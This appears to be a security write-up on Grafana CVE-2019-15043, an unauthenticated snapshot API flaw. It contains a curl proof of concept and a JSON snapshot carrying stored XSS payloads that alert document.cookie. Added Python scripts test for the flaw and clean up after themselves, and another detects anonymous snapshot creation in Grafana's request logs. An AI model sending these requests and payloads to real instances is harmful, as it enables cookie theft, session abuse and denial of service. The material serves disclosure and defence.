Exploit Grafana (CVE‑2019‑15043)
Grafana is a monitoring dashboard used to display metrics. It's used by many infrastructure and development teams.
This CVE (not found by me) is an authentication bypass on the snapshot API: Grafana 2.x through 6.3.3 accepts POST /api/snapshots without any credentials (fixed in 6.3.4). It allows:
- creation of snapshots without authentication
- DoS of the server by posting many large snapshots (each one is stored in Grafana's database)
- stored XSS in the snapshot content: the script runs in Grafana's origin, so it can call the Grafana API with the viewing user's session
- stored XSS: possibly reading non-HttpOnly cookies that are scoped to the parent domain and therefore shared with other subdomains
PoC
# no cookie and no Authorization header: the request is fully unauthenticated
curl -ik https://GRAFANA/api/snapshots/ \
     -H 'Content-Type: application/json' \
     --data @snapshotrequest.json
where snapshotrequest.json (for Grafana v4.4.3, hence the rows-based 4.x dashboard schema below) contains something like:
{
  "dashboard": {
    "annotations": {
      "list": []
    },
    "editable": true,
    "graphTooltip": 1,
    "hideControls": false,
    "id": null,
    "links": [
      {
        "icon": "question",
        "tags": [],
        "title": "Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello... repeated many times to make the screen fill up and cause the tooltip to be triggered",
        "tooltip": "Hello <u>there</u><script>alert('tooltip says ' + document.cookie)</script>",
        "type": "link",
        "url": "javascript:alert('3'+document.cookie)"
      }
    ],
    "refresh": "5s",
    "rows": [
      {
        "height": "500px",
        "panels": [
          {
            "content": "Hello <script>alert('panel says ' + document.cookie)</script>",
            "datasource": null,
            "description": "Description",
            "id": 1,
            "links": [],
            "mode": "html",
            "span": 12,
            "targets": [],
            "title": "Panel",
            "type": "text"
          }
        ],
        "span": 12
      }
    ],
    "schemaVersion": 17,
    "snapshot": {
      "external": true,
      "originalUrl": "javascript:alert('4'+document.cookie)"
    },
    "style": "dark",
    "tags": [],
    "templating": {
      "list": []
    },
    "time": {
      "from": "now-6h",
      "to": "now"
    },
    "timepicker": {
      "refresh_intervals": [],
      "time_options": []
    },
    "timezone": "browser",
    "title": "This is a snapshot",
    "uid": "abcdef",
    "version": 0
  }
}
The response will be e.g.:
{
  "deleteKey": "bUT3gkzSCrsrGZScAbW1IM0RX4QUPXj0",
  "deleteUrl": "/api/snapshots-delete/bUT3gkzSCrsrGZScAbW1IM0RX4QUPXj0",
  "key": "5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz",
  "url": "/dashboard/snapshot/5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz"
}
The snapshot is then viewable at the returned url (here /dashboard/snapshot/5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz; snapshot pages are public by design, so the victim needs no login) and, for logged-in users, in the list at /dashboard/snapshots. The deleteUrl removes it again for anyone holding the deleteKey, which is also how to clean up after testing.
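The same request and response handling as a small Python script, so the check can be repeated against an instance and cleaned up afterwards. This is an added example, not code from the original post. It assumes only what the post shows (the POST /api/snapshots endpoint and the key/url/deleteKey/deleteUrl fields of the reply) plus two things from Grafana's documented snapshot API: the optional expires lifetime in seconds, and that the deleteUrl is fetched with a plain GET. The hostnames are placeholders.

```python
"""Added example (not the original post's code): drive the unauthenticated
snapshot check from Python and clean up afterwards.

Assumptions not stated on the page: the instance is reachable at the base
URL given on the command line; 'expires' is the optional snapshot lifetime
in seconds from Grafana's documented snapshot API; the deleteUrl is
fetched with a plain GET.
"""
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin


def build_snapshot_request(title: str, panel_html: str, expires: int = 3600) -> dict:
    """Minimal Grafana 4.x-style (rows-based) dashboard for POST /api/snapshots.

    A single text panel in html mode is enough to prove the point: its
    content is rendered as HTML when the snapshot page loads.  The links,
    templating and timepicker blocks of the hand-written PoC are optional.
    """
    panel = {
        "id": 1,
        "type": "text",
        "mode": "html",
        "title": "Panel",
        "span": 12,
        "content": panel_html,
    }
    dashboard = {
        "editable": False,
        "id": None,
        "rows": [{"height": "250px", "span": 12, "panels": [panel]}],
        "schemaVersion": 17,
        "title": title,
        "version": 0,
    }
    # 'expires' makes Grafana drop the snapshot itself after N seconds, so a
    # forgotten test snapshot does not live forever in the database.
    return {"dashboard": dashboard, "name": title, "expires": expires}


def parse_snapshot_response(base_url: str, body: bytes) -> dict:
    """Resolve the reply's url/deleteUrl (relative in the post, absolute on
    newer versions) against the instance.  A reply without these fields
    (an error message, a login page) raises KeyError/ValueError instead of
    being mistaken for success."""
    data = json.loads(body)
    return {
        "key": data["key"],
        "delete_key": data["deleteKey"],
        "view_url": urljoin(base_url, data["url"]),
        "delete_url": urljoin(base_url, data["deleteUrl"]),
    }


def create_snapshot(base_url: str, payload: dict, timeout: float = 10) -> dict:
    """POST the snapshot with no cookie and no Authorization header.

    A 200 with a key means anonymous snapshot creation is accepted (the
    CVE-2019-15043 behaviour); a patched instance answers 401.
    """
    req = urllib.request.Request(
        urljoin(base_url, "/api/snapshots"),
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_snapshot_response(base_url, resp.read())


def delete_snapshot(delete_url: str, timeout: float = 10) -> int:
    """Remove the snapshot again via the deleteKey URL the server returned."""
    with urllib.request.urlopen(delete_url, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "https://GRAFANA"
    payload = build_snapshot_request("snapshot test", "<b>unauth snapshot marker</b>")
    try:
        info = create_snapshot(base, payload)
    except urllib.error.HTTPError as exc:
        print(f"anonymous snapshot creation rejected: HTTP {exc.code}")
        sys.exit(0)
    print("anonymous snapshot created:", info["view_url"])
    print("cleanup status:", delete_snapshot(info["delete_url"]))
```

Run it as `python3 check_snapshots.py https://GRAFANA`; a patched instance ends at the 401 branch, a vulnerable one prints the public snapshot URL and then deletes it. Keep the panel content to a harmless marker when checking someone else's instance; the alert payloads from the PoC above belong in a lab.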
The stored XSS fires in two places:
- on page load, via the text panel in html mode (rendering the content as HTML is normal Grafana functionality; the bug is only that an anonymous user could store it)
- on hovering over the "Hello Hello Hello..." dashboard link, whose tooltip is rendered unescaped (CVE-2018-12099, fixed in Grafana 5.2.0-beta1, so this second trigger only works on older versions)
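On the defensive side, here is an added example (not part of the original post) of spotting this on the server. With router_logging = true under [server], Grafana writes one logfmt line per request that includes the authenticated userId (0 for an anonymous request), method, path, status and remote_addr. The script parses such lines, flags anonymous successful POSTs to /api/snapshots, and counts them per source address to catch the snapshot-flood DoS variant. The log lines are constructed for the example, the exact field set is assumed from that log format, and the threshold is an arbitrary choice.

```python
"""Added example (not the original post's code): find anonymous snapshot
creation in Grafana's router log.

Assumed log format (Grafana with router_logging = true under [server]): one
logfmt line per request, e.g. msg="Request Completed" ... userId=0 orgId=0
uname= method=POST path=/api/snapshots status=200 remote_addr=...  The
lines below are constructed for the example, not captured traffic.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
t=2019-09-01T10:00:00+0000 lvl=info msg="Request Completed" logger=context userId=1 orgId=1 uname=admin method=POST path=/api/snapshots status=200 remote_addr=10.0.0.5 time_ms=11 size=180 referer=https://grafana.example/dashboard/db/ops
t=2019-09-01T10:00:03+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=0 uname= method=POST path=/api/snapshots/ status=200 remote_addr=203.0.113.7 time_ms=9 size=176 referer=
t=2019-09-01T10:00:04+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=0 uname= method=POST path=/api/snapshots status=200 remote_addr=203.0.113.7 time_ms=8 size=176 referer=
t=2019-09-01T10:00:04+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=0 uname= method=POST path=/api/snapshots status=200 remote_addr=203.0.113.7 time_ms=8 size=176 referer=
t=2019-09-01T10:00:31+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=0 uname= method=GET path=/dashboard/snapshot/5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz status=200 remote_addr=198.51.100.9 time_ms=3 size=4120 referer=
t=2019-09-01T10:01:20+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=0 uname= method=POST path=/api/snapshots status=401 remote_addr=198.51.100.2 time_ms=1 size=27 referer=
"""

# key=value pairs; a value is either a double-quoted string or a run of
# non-space characters, possibly empty (uname= for anonymous requests).
LOGFMT_PAIR = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')


def parse_logfmt(line: str) -> dict:
    """Parse one logfmt line into a dict, stripping quotes from quoted values."""
    return {
        key: val[1:-1] if val.startswith('"') else val
        for key, val in LOGFMT_PAIR.findall(line)
    }


def find_anonymous_snapshot_creates(lines) -> list:
    """Return the records of successful snapshot POSTs made with no session.

    userId=0 is what Grafana logs for an unauthenticated request.  A patched
    instance logs status=401 for the same request, so only 200s count.
    The trailing slash is normalised because the PoC posts to /api/snapshots/.
    """
    hits = []
    for line in lines:
        rec = parse_logfmt(line)
        if (
            rec.get("method") == "POST"
            and rec.get("path", "").rstrip("/") == "/api/snapshots"
            and rec.get("userId") == "0"
            and rec.get("status") == "200"
        ):
            hits.append(rec)
    return hits


def burst_sources(hits, threshold: int) -> dict:
    """Sources that created at least `threshold` anonymous snapshots: the
    DoS variant, many large snapshots being stored in Grafana's database."""
    counts = Counter(rec["remote_addr"] for rec in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = find_anonymous_snapshot_creates(SAMPLE_LOG.splitlines())
    for rec in hits:
        print(f"{rec['t']} anonymous snapshot created from {rec['remote_addr']}")
    for ip, n in burst_sources(hits, threshold=3).items():
        print(f"possible snapshot flood: {n} anonymous snapshots from {ip}")
```

Note what the log cannot tell you: the snapshot key is not in the creation line, so linking a later GET /dashboard/snapshot/<key> to its anonymous creator needs the snapshot table or a proxy log with request bodies. Anonymous views of snapshots are normal (shareable links), so they are deliberately not flagged here.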